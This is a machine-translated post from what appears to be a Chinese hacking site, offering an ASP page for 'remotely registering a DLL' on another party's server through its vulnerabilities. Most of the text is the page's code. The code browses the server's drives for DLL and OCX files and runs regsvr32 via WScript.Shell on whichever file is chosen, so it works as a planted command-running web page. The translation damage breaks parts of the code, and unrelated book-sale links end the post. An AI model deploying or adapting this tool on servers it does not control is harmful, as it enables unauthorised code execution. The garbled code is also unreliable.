Use the other server vulnerabilities remote register a DLL-vulnerability warning-the black bar safety net

2008-10-16T00:00:00
ID MYHACK58:62200820703
Type myhack58
Reporter 佚名
Modified 2008-10-16T00:00:00

Description

Use the other server vulnerabilities remote register a DLL My friend and I downloaded together a the same components, suffer from you cannot register and useless, but recently I found him in the use of this component, apparently, is already registered, curious, strange, how did he get registered? I asked him, he does not say.

In fact, we in ASP, is there a shortcut to the remote register a DLL, but need the other server vulnerabilities“fit”and what is vulnerability? I didn't say anything, Ah, yourself. Try the following code, perhaps a Fluke success: <% Response. Buffer = True %> <% Server. ScriptTimeout = 5 0 0 Dim frmFolderPath, frmFilePath

frmFolderPath = Request. Form("frmFolderPath") frmFilePath = Request. Form("frmDllPath") frmMethod = Request. Form("frmMethod") btnREG = Request. Form("btnREG") %>

<HTML> <HEAD> <TITLE>wonderful spring breeze of the remote register a DLL</TITLE> <STYLE TYPE="TEXT/CSS"> . Legend {FONT-FAMILY: veranda; FONT-SIZE: 14px; FONT-WEIGHT: bold; COLOR: blue} . FS {FONT-FAMILY: veranda; FONT-SIZE: 12px; BORDER-WIDTH: 4px; BORDER-COLOR: green; MARGIN-LEFT:2px; MARGIN-RIGHT:2px} TD {MARGIN-LEFT:6px; MARGIN-RIGHT:6px; PADDING-LEFT:12px; PADDING-RIGHT:12px} </STYLE> </HEAD>

<BODY> <FORM NAME="regForm" METHOD="POST"> <TABLE BORDER=0 CELLSPACING=6 CELLPADDING=6 MARGINWIDTH=6> <TR> <TD VALIGN=TOP> <FIELDSET ID=FS1 NAME=FS1 CLASS=FS> <LEGEND CLASS=Legend>registration DLL</LEGEND> A knock to the DLL directory to the path

<INPUT TYPE=TEXT NAME="frmFolderPath" VALUE="<%=frmFolderPath%>">

<INPUT TYPE=SUBMIT NAME=btnFileList VALUE="create file list">

<% IF Request. Form("btnFileList") <> "" OR btnREG <> "" Then Set RegisterFiles = New clsRegister RegisterFiles. EchoB("Select File") Call RegisterFiles. init(frmFolderPath) RegisterFiles. EchoB(" <INPUT TYPE=SUBMIT NAME=btnREG VALUE=" & Chr(3 4) _ & "REG/UNREG" & Chr(3 4) & ">") IF Request. Form("btnREG") <> "" Then Call RegisterFiles. Register(frmFilePath, frmMethod) End IF Set RegisterFiles = Nothing End IF %> </FIELDSET> </TD> </TR> </TABLE> </FORM> </BODY> </HTML> <% Class clsRegister

Private m_oFS

Public Property Let oFS(objOFS) m_oFS = objOFS End Property ...... Sub init(strRoot) 'Root to Search (c:, d:, e:) Dim oDrive, oRootDir IF oFS. FolderExists(strRoot) Then IF Len(strRoot) < 3 Then 'Must Be a Drive Set oDrive = oFS. GetDrive(strRoot) Set oRootDir = oDrive. RootFolder Else Set oRootDir = oFS. GetFolder(strRoot) End IF Else EchoB("Oh,the folder(" &strRoot&") not found!") Exit Sub End IF setRoot = oRootDir

Echo("<SELECT NAME=" & Chr(3 4) & "frmDllPath" & Chr(3 4) & ">") Call getAllDlls(oRootDir) EchoB("</SELECT>") BuildOptions End Sub

Sub getAllDlls(oParentFolder) Dim oSubFolders, oFile, oFiles Set oSubFolders = oParentFolder. SubFolders Set opFiles = oParentFolder. Files

For Each oFile in opFiles IF Right(lCase(oFile. Name), 4) = ". dll" OR Right(lCase(oFile. Name), 4) = ". ocx" Then Echo("<OPTION VALUE=" & Chr(3 4) & oFile. Path & Chr(3 4) & ">" _ & oFile. Name & "</Option>") End IF Next

On Error Resume Next For Each oFolder In oSubFolders 'Iterate All Folders in Drive Set oFiles = oFolder. Files For Each oFile in oFiles IF Right(lCase(oFile. Name), 4) = ". dll" OR Right(lCase(oFile. Name), 4) = ". ocx" Then Echo("<OPTION VALUE=" & Chr(3 4) & oFile. Path & Chr(3 4) & ">" _ & oFile. Name & "</Option>") End IF Next Call getAllDlls(oFolder) Next On Error GoTo 0 End Sub

Sub Register(strFilePath, regMethod) Dim file, strFile, oShell, exitcode Set file = oFS. GetFile(strFilePath) strFile = file. Path

Set oShell = CreateObject ("WScript. Shell")

IF regMethod = "REG" Then 'Register oShell. Run "c:\WINNT\system32\regsvr32.exe /s" & strFile, 0, False exitcode = oShell. Run("c:\WINNT\system32\regsvr32.exe /s" & strFile, 0, False) EchoB("regsvr32.exe exitcode =" & exitcode) Else 'unRegister oShell. Run "c:\WINNT\system32\regsvr32.exe /u/s" & strFile, 0, False exitcode = oShell. Run("c:\WINNT\system32\regsvr32.exe /u/s" & strFile, 0, False) EchoB("regsvr32.exe exitcode =" & exitcode) End IF

Cleanup oShell End Sub

Sub BuildOptions EchoB("Register: <INPUT TYPE=RADIO NAME=frmMethod VALUE=REG CHECKED>") EchoB("unRegister: <INPUT TYPE=RADIO NAME=frmMethod VALUE=UNREG>") End Sub

Function Echo(str) Echo = Response. Write(str & vbCrLf) End Function

Function EchoB(str) EchoB = Response. Write(str &" "& vbCrLf) End Function

Sub Cleanup(obj) If isObject(obj) Then Set obj = Nothing End IF End Sub

Sub Class_Terminate() Cleanup oFS End Sub End Class %>

\ ---- Best answer: http://www.huachu.com.cn/itbook/itbookinfo.asp?lbbh=BD04605180 http://www.waterpub.com.cn/sale/result.asp?id=5301 The best description: http://www.intels.net/ \ ---- The Internet is the first productivity; Building a website is its core; ASP Is the site of the soul. \ ---- The ASP and associated database technology advanced guide [the ASP's expert] is